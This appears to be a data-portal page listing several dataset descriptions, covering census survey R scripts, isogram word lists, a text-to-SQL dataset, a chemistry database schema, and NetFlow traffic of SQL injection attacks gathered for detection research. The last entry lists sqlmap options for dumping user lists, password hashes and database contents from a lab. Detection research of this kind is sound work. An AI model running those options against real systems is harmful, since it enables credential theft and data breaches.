the replicate weights, then store it in a sql database create a new variable - one - in the data table 2012 asec - analysis examples.R connect to the sql database created by the 'download all microdata' progr am create the complex sample survey object, using the replicate weights perform a boatload of analysis examples replicate census estimates - 2011.R connect to the sql database created by the 'download all microdata' program create the complex sample survey object, using the replicate weights match the sas output shown in the png file below 2011 asec replicate weight sas output.png statistic and standard error generated from the replicate-weighted example sas script contained in this census-provided person replicate weights usage instructions document. click here to view these three scripts for more detail about the current population survey - annual social and economic supplement (cps-asec), visit: the census bureau's current population survey page the bureau of labor statistics' current population survey page the current population survey's wikipedia article notes: interviews are conducted in march about experiences during the previous year. the file labeled 2012 includes information (income, work experience, health insurance) pertaining to 2011. when you use the current populat ion survey to talk about america, subract a year from the data file name. as of the 2010 file (the interview focusing on america during 2009), the cps-asec contains exciting new medical out-of-pocket spending variables most useful for supplemental (medical spending-adjusted) poverty research. confidential to sas, spss, stata, sudaan users: why are you still rubbing two sticks together after we've invented the butane lighter? time to transition to r. :D
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
A collection of datasets and python scripts for extraction and analysis of isograms (and some palindromes and tautonyms) from corpus-based word-lists, specifically Google Ngram and the British National Corpus (BNC).Below follows a brief description, first, of the included datasets and, second, of the included scripts.1. DatasetsThe data from English Google Ngrams and the BNC is available in two formats: as a plain text CSV file and as a SQLite3 database.1.1 CSV formatThe CSV files for each dataset actually come in two parts: one labelled ".csv" and one ".totals". The ".csv" contains the actual extracted data, and the ".totals" file contains some basic summary statistics about the ".csv" dataset with the same name.The CSV files contain one row per data point, with the colums separated by a single tab stop. There are no labels at the top of the files. Each line has the following columns, in this order (the labels below are what I use in the database, which has an identical structure, see section below):
Label Data type Description
isogramy int The order of isogramy, e.g. "2" is a second order isogram
length int The length of the word in letters
word text The actual word/isogram in ASCII
source_pos text The Part of Speech tag from the original corpus
count int Token count (total number of occurences)
vol_count int Volume count (number of different sources which contain the word)
count_per_million int Token count per million words
vol_count_as_percent int Volume count as percentage of the total number of volumes
is_palindrome bool Whether the word is a palindrome (1) or not (0)
is_tautonym bool Whether the word is a tautonym (1) or not (0)
The ".totals" files have a slightly different format, with one row per data point, where the first column is the label and the second column is the associated value. The ".totals" files contain the following data:
Label
Data type
Description
!total_1grams
int
The total number of words in the corpus
!total_volumes
int
The total number of volumes (individual sources) in the corpus
!total_isograms
int
The total number of isograms found in the corpus (before compacting)
!total_palindromes
int
How many of the isograms found are palindromes
!total_tautonyms
int
How many of the isograms found are tautonyms
The CSV files are mainly useful for further automated data processing. For working with the data set directly (e.g. to do statistics or cross-check entries), I would recommend using the database format described below.1.2 SQLite database formatOn the other hand, the SQLite database combines the data from all four of the plain text files, and adds various useful combinations of the two datasets, namely:• Compacted versions of each dataset, where identical headwords are combined into a single entry.• A combined compacted dataset, combining and compacting the data from both Ngrams and the BNC.• An intersected dataset, which contains only those words which are found in both the Ngrams and the BNC dataset.The intersected dataset is by far the least noisy, but is missing some real isograms, too.The columns/layout of each of the tables in the database is identical to that described for the CSV/.totals files above.To get an idea of the various ways the database can be queried for various bits of data see the R script described below, which computes statistics based on the SQLite database.2. ScriptsThere are three scripts: one for tiding Ngram and BNC word lists and extracting isograms, one to create a neat SQLite database from the output, and one to compute some basic statistics from the data. The first script can be run using Python 3, the second script can be run using SQLite 3 from the command line, and the third script can be run in R/RStudio (R version 3).2.1 Source dataThe scripts were written to work with word lists from Google Ngram and the BNC, which can be obtained from http://storage.googleapis.com/books/ngrams/books/datasetsv2.html and [https://www.kilgarriff.co.uk/bnc-readme.html], (download all.al.gz).For Ngram the script expects the path to the directory containing the various files, for BNC the direct path to the *.gz file.2.2 Data preparationBefore processing proper, the word lists need to be tidied to exclude superfluous material and some of the most obvious noise. This will also bring them into a uniform format.Tidying and reformatting can be done by running one of the following commands:python isograms.py --ngrams --indir=INDIR --outfile=OUTFILEpython isograms.py --bnc --indir=INFILE --outfile=OUTFILEReplace INDIR/INFILE with the input directory or filename and OUTFILE with the filename for the tidied and reformatted output.2.3 Isogram ExtractionAfter preparing the data as above, isograms can be extracted from by running the following command on the reformatted and tidied files:python isograms.py --batch --infile=INFILE --outfile=OUTFILEHere INFILE should refer the the output from the previosu data cleaning process. Please note that the script will actually write two output files, one named OUTFILE with a word list of all the isograms and their associated frequency data, and one named "OUTFILE.totals" with very basic summary statistics.2.4 Creating a SQLite3 databaseThe output data from the above step can be easily collated into a SQLite3 database which allows for easy querying of the data directly for specific properties. The database can be created by following these steps:1. Make sure the files with the Ngrams and BNC data are named “ngrams-isograms.csv” and “bnc-isograms.csv” respectively. (The script assumes you have both of them, if you only want to load one, just create an empty file for the other one).2. Copy the “create-database.sql” script into the same directory as the two data files.3. On the command line, go to the directory where the files and the SQL script are. 4. Type: sqlite3 isograms.db 5. This will create a database called “isograms.db”.See the section 1 for a basic descript of the output data and how to work with the database.2.5 Statistical processingThe repository includes an R script (R version 3) named “statistics.r” that computes a number of statistics about the distribution of isograms by length, frequency, contextual diversity, etc. This can be used as a starting point for running your own stats. It uses RSQLite to access the SQLite database version of the data described above.
Facebook
TwitterThis dataset is a merged collection of multiple text-to-SQL datasets, designed to provide a comprehensive resource for training and evaluating text-to-SQL models. It combines data from several popular benchmarks, including Spider, CoSQL, SparC, and others, to create a diverse and robust dataset for natural language to SQL query generation tasks. Dataset Details Dataset Description Curated by: Mudasir Ahmad Mir Language(s) (NLP): English License: Apache 2.0 This dataset is ideal for researchers… See the full description on the dataset page: https://huggingface.co/datasets/Mudasir692/text-to-sql.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
The provided ZIP archive contains an XML file "main-database-description.xml" with the description of all tables (VIEWS) that are exposed publicly at the PLBD server (https://plbd.org/). In the XML file, all columns of the visible tables are described, specifying their SQL types, measurement units, semantics, calculation formulae, SQL statements that can be used to generate values in these columns, and publications of the formulae derivations.
The XML file conforms to the published XSD schema created for descriptions of relational databases for specifications of scientific measurement data. The XSD schema ("relational-database_v2.0.0-rc.18.xsd") and all included sub-schemas are provided in the same archive for convenience. All XSD schemas are validated against the "XMLSchema.xsd" schema from the W3C consortium.
The ZIP file contains the excerpt from the files hosted in the https://plbd.org/ at the moment of submission of the PLBD database in the Scientific Data journal, and is provided to conform the journal policies. The current data and schemas should be fetched from the published URIs:
https://plbd.org/
https://plbd.org/doc/db/schemas
https://plbd.org/doc/xml/schemas
Software that is used to generate SQL schemas, RestfulDB metadata and the RestfulDB middleware that allows to publish the databases generated from the XML description on the Web are available at public Subversion repositories:
svn://www.crystallography.net/solsa-database-scripts
svn://saulius-grazulis.lt/restfuldb
The unpacked ZIP file will create the "db/" directory with the tree layout given below. In addition to the database description file "main-database-description.xml", all XSD schemas necessary for validation of the XML file are provided. On a GNU/Linux operating system with a GNU Make package installed, the XML file validity can be checked by unpacking the ZIP file, entering the unpacked directory, and running 'make distclean; make'. For example, on a Linux Mint distribution, the following commands should work:
unzip main-database-description.zip
cd db/release/v0.10.0/tables/
sh -x dependencies/Linuxmint-20.1/install.sh
make distclean
make
If necessary, additional packages can be installed using the 'install.sh' script in the 'dependencies/' subdirectory corresponding to your operating system. As of the moment of writing, Debian-10 and Linuxmint-20.1 OSes are supported out of the box; similar OSes might work with the same 'install.sh' scripts. The installation scripts require to run package installation command under system administrator privileges, but they use only the standard system package manager, thus they should not put your system at risk. For validation and syntax checking, the 'rxp' and 'xmllint' programs are used.
The log files provided in the "outputs/validation" subdirectory contain validation logs obtained on the system where the XML files were last checked and should indicate validity of the provided XML file against the references schemas.
db/
└── release
└── v0.10.0
└── tables
├── Makeconfig-validate-xml
├── Makefile
├── Makelocal-validate-xml
├── dependencies
├── main-database-description.xml
├── outputs
└── schema
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.
NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
Dataset
Aim
Samples
Benign-malicious
traffic ratio
D1
Training
400,003
50%
D2
Test
57,239
50%
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.
DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).
The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.
The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.
Parameters
Description
'--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema'
Enumerate users, password hashes, privileges, roles, databases, tables and columns
--level=5
Increase the probability of a false positive identification
--risk=3
Increase the probability of extracting data
--random-agent
Select the User-Agent randomly
--batch
Never ask for user input, use the default behavior
--answers="follow=Y"
Predefined answers to yes
Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).
The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.
However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.
To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.